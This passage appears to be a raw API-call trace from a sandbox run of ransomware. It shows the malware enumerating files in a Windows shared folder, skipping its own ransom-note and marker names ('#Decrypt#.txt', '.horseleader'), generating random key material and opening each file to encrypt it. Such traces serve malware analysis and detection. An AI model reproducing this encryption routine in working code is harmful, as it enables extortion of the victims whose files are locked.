CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.165] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0234.165] lstrcmpiW (lpString1="ipsfin.xml", lpString2="Windows") returned -1 [0234.165] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 65 [0234.165] StrStrIW (lpFirst="ipsfin.xml", lpSrch=".horseleader") returned 0x0 [0234.165] lstrcmpW (lpString1="ipsfin.xml", lpString2="#Decrypt#.txt") returned 1 [0234.165] lstrcmpW (lpString1="ipsfin.xml", lpString2="_uninstalling_.png") returned 1 [0234.165] lstrlenW (lpString=".testttjffg") returned 11 [0234.165] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpSrch=".testttjffg") returned 0x0 [0234.165] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.165] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.165] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, 
ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0234.166] lstrcmpiW (lpString1="ipsfra.xml", lpString2="Windows") returned -1 [0234.166] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 65 [0234.166] StrStrIW (lpFirst="ipsfra.xml", lpSrch=".horseleader") returned 0x0 [0234.166] lstrcmpW (lpString1="ipsfra.xml", lpString2="#Decrypt#.txt") returned 1 [0234.166] lstrcmpW (lpString1="ipsfra.xml", lpString2="_uninstalling_.png") returned 1 [0234.166] lstrlenW (lpString=".testttjffg") returned 11 [0234.166] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpSrch=".testttjffg") returned 0x0 [0234.166] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.166] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.166] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.171] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, 
ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0234.171] lstrcmpiW (lpString1="ipshrv.xml", lpString2="Windows") returned -1 [0234.171] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 65 [0234.171] StrStrIW (lpFirst="ipshrv.xml", lpSrch=".horseleader") returned 0x0 [0234.171] lstrcmpW (lpString1="ipshrv.xml", lpString2="#Decrypt#.txt") returned 1 [0234.171] lstrcmpW (lpString1="ipshrv.xml", lpString2="_uninstalling_.png") returned 1 [0234.171] lstrlenW (lpString=".testttjffg") returned 11 [0234.171] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpSrch=".testttjffg") returned 0x0 [0234.171] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.171] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.172] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, 
nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0234.172] lstrcmpiW (lpString1="ipsita.xml", lpString2="Windows") returned -1 [0234.172] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned 65 [0234.172] StrStrIW (lpFirst="ipsita.xml", lpSrch=".horseleader") returned 0x0 [0234.172] lstrcmpW (lpString1="ipsita.xml", lpString2="#Decrypt#.txt") returned 1 [0234.172] lstrcmpW (lpString1="ipsita.xml", lpString2="_uninstalling_.png") returned 1 [0234.172] lstrlenW (lpString=".testttjffg") returned 11 [0234.172] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpSrch=".testttjffg") returned 0x0 [0234.172] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.172] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.172] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0234.173] lstrcmpiW (lpString1="ipsjpn.xml", lpString2="Windows") returned -1 [0234.173] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned 65 [0234.173] StrStrIW (lpFirst="ipsjpn.xml", lpSrch=".horseleader") returned 0x0 [0234.173] lstrcmpW (lpString1="ipsjpn.xml", lpString2="#Decrypt#.txt") returned 1 [0234.173] lstrcmpW (lpString1="ipsjpn.xml", lpString2="_uninstalling_.png") returned 1 [0234.173] lstrlenW (lpString=".testttjffg") returned 11 [0234.173] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpSrch=".testttjffg") returned 0x0 [0234.173] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.173] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.173] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.173] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0234.173] lstrcmpiW 
(lpString1="ipskor.xml", lpString2="Windows") returned -1 [0234.173] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned 65 [0234.174] StrStrIW (lpFirst="ipskor.xml", lpSrch=".horseleader") returned 0x0 [0234.174] lstrcmpW (lpString1="ipskor.xml", lpString2="#Decrypt#.txt") returned 1 [0234.174] lstrcmpW (lpString1="ipskor.xml", lpString2="_uninstalling_.png") returned 1 [0234.174] lstrlenW (lpString=".testttjffg") returned 11 [0234.174] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpSrch=".testttjffg") returned 0x0 [0234.174] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.174] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.174] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.175] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dc49d13, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5dc49d13, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0234.175] lstrcmpiW (lpString1="IpsMigrationPlugin.dll", lpString2="Windows") returned -1 
[0234.175] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll") returned 77 [0234.175] StrStrIW (lpFirst="IpsMigrationPlugin.dll", lpSrch=".horseleader") returned 0x0 [0234.175] lstrcmpW (lpString1="IpsMigrationPlugin.dll", lpString2="#Decrypt#.txt") returned 1 [0234.175] lstrcmpW (lpString1="IpsMigrationPlugin.dll", lpString2="_uninstalling_.png") returned 1 [0234.175] lstrlenW (lpString=".testttjffg") returned 11 [0234.175] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll", lpSrch=".testttjffg") returned 0x0 [0234.175] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.176] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.176] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0234.176] lstrcmpiW (lpString1="ipsnld.xml", lpString2="Windows") returned -1 
[0234.176] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 65 [0234.176] StrStrIW (lpFirst="ipsnld.xml", lpSrch=".horseleader") returned 0x0 [0234.176] lstrcmpW (lpString1="ipsnld.xml", lpString2="#Decrypt#.txt") returned 1 [0234.176] lstrcmpW (lpString1="ipsnld.xml", lpString2="_uninstalling_.png") returned 1 [0234.176] lstrlenW (lpString=".testttjffg") returned 11 [0234.176] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", lpSrch=".testttjffg") returned 0x0 [0234.176] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.176] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.177] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0234.177] lstrcmpiW (lpString1="ipsnor.xml", lpString2="Windows") returned -1 [0234.177] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml") returned 65 [0234.177] StrStrIW (lpFirst="ipsnor.xml", lpSrch=".horseleader") returned 0x0 [0234.177] lstrcmpW (lpString1="ipsnor.xml", lpString2="#Decrypt#.txt") returned 1 [0234.177] lstrcmpW (lpString1="ipsnor.xml", lpString2="_uninstalling_.png") returned 1 [0234.177] lstrlenW (lpString=".testttjffg") returned 11 [0234.177] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", lpSrch=".testttjffg") returned 0x0 [0234.177] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.177] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.177] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.177] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsplk.xml", cAlternateFileName="")) returned 1 [0234.177] lstrcmpiW (lpString1="ipsplk.xml", lpString2="Windows") returned -1 [0234.178] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") 
returned 65 [0234.178] StrStrIW (lpFirst="ipsplk.xml", lpSrch=".horseleader") returned 0x0 [0234.178] lstrcmpW (lpString1="ipsplk.xml", lpString2="#Decrypt#.txt") returned 1 [0234.178] lstrcmpW (lpString1="ipsplk.xml", lpString2="_uninstalling_.png") returned 1 [0234.178] lstrlenW (lpString=".testttjffg") returned 11 [0234.178] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpSrch=".testttjffg") returned 0x0 [0234.178] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.178] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.179] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63de1b63, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x63de1b63, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a991650, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0234.179] lstrcmpiW (lpString1="IpsPlugin.dll", lpString2="Windows") returned -1 [0234.179] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned 68 [0234.179] StrStrIW (lpFirst="IpsPlugin.dll", 
lpSrch=".horseleader") returned 0x0 [0234.179] lstrcmpW (lpString1="IpsPlugin.dll", lpString2="#Decrypt#.txt") returned 1 [0234.179] lstrcmpW (lpString1="IpsPlugin.dll", lpString2="_uninstalling_.png") returned 1 [0234.179] lstrlenW (lpString=".testttjffg") returned 11 [0234.179] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll", lpSrch=".testttjffg") returned 0x0 [0234.179] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.180] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.180] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0234.180] lstrcmpiW (lpString1="ipsptb.xml", lpString2="Windows") returned -1 [0234.180] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 65 [0234.180] StrStrIW (lpFirst="ipsptb.xml", lpSrch=".horseleader") returned 0x0 [0234.180] lstrcmpW 
(lpString1="ipsptb.xml", lpString2="#Decrypt#.txt") returned 1 [0234.180] lstrcmpW (lpString1="ipsptb.xml", lpString2="_uninstalling_.png") returned 1 [0234.180] lstrlenW (lpString=".testttjffg") returned 11 [0234.180] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpSrch=".testttjffg") returned 0x0 [0234.180] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.180] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.181] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0234.181] lstrcmpiW (lpString1="ipsptg.xml", lpString2="Windows") returned -1 [0234.181] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned 65 [0234.181] StrStrIW (lpFirst="ipsptg.xml", lpSrch=".horseleader") returned 0x0 [0234.181] lstrcmpW (lpString1="ipsptg.xml", lpString2="#Decrypt#.txt") returned 1 [0234.181] lstrcmpW 
